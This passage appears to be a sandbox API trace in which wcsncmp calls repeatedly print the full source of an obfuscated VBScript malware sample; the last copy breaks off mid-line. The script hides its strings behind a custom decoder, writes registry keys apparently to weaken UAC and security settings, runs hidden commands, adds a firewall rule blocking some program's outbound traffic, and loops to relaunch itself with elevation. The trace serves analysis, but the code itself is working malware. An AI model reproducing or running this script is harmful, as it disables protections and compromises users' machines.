1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0222.928] wcsncmp (_String1="E7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.928] wcsncmp (_String1="7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42 [0222.928] wcsncmp (_String1=" = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.928] wcsncmp (_String1="= 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.928] wcsncmp (_String1=" 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = 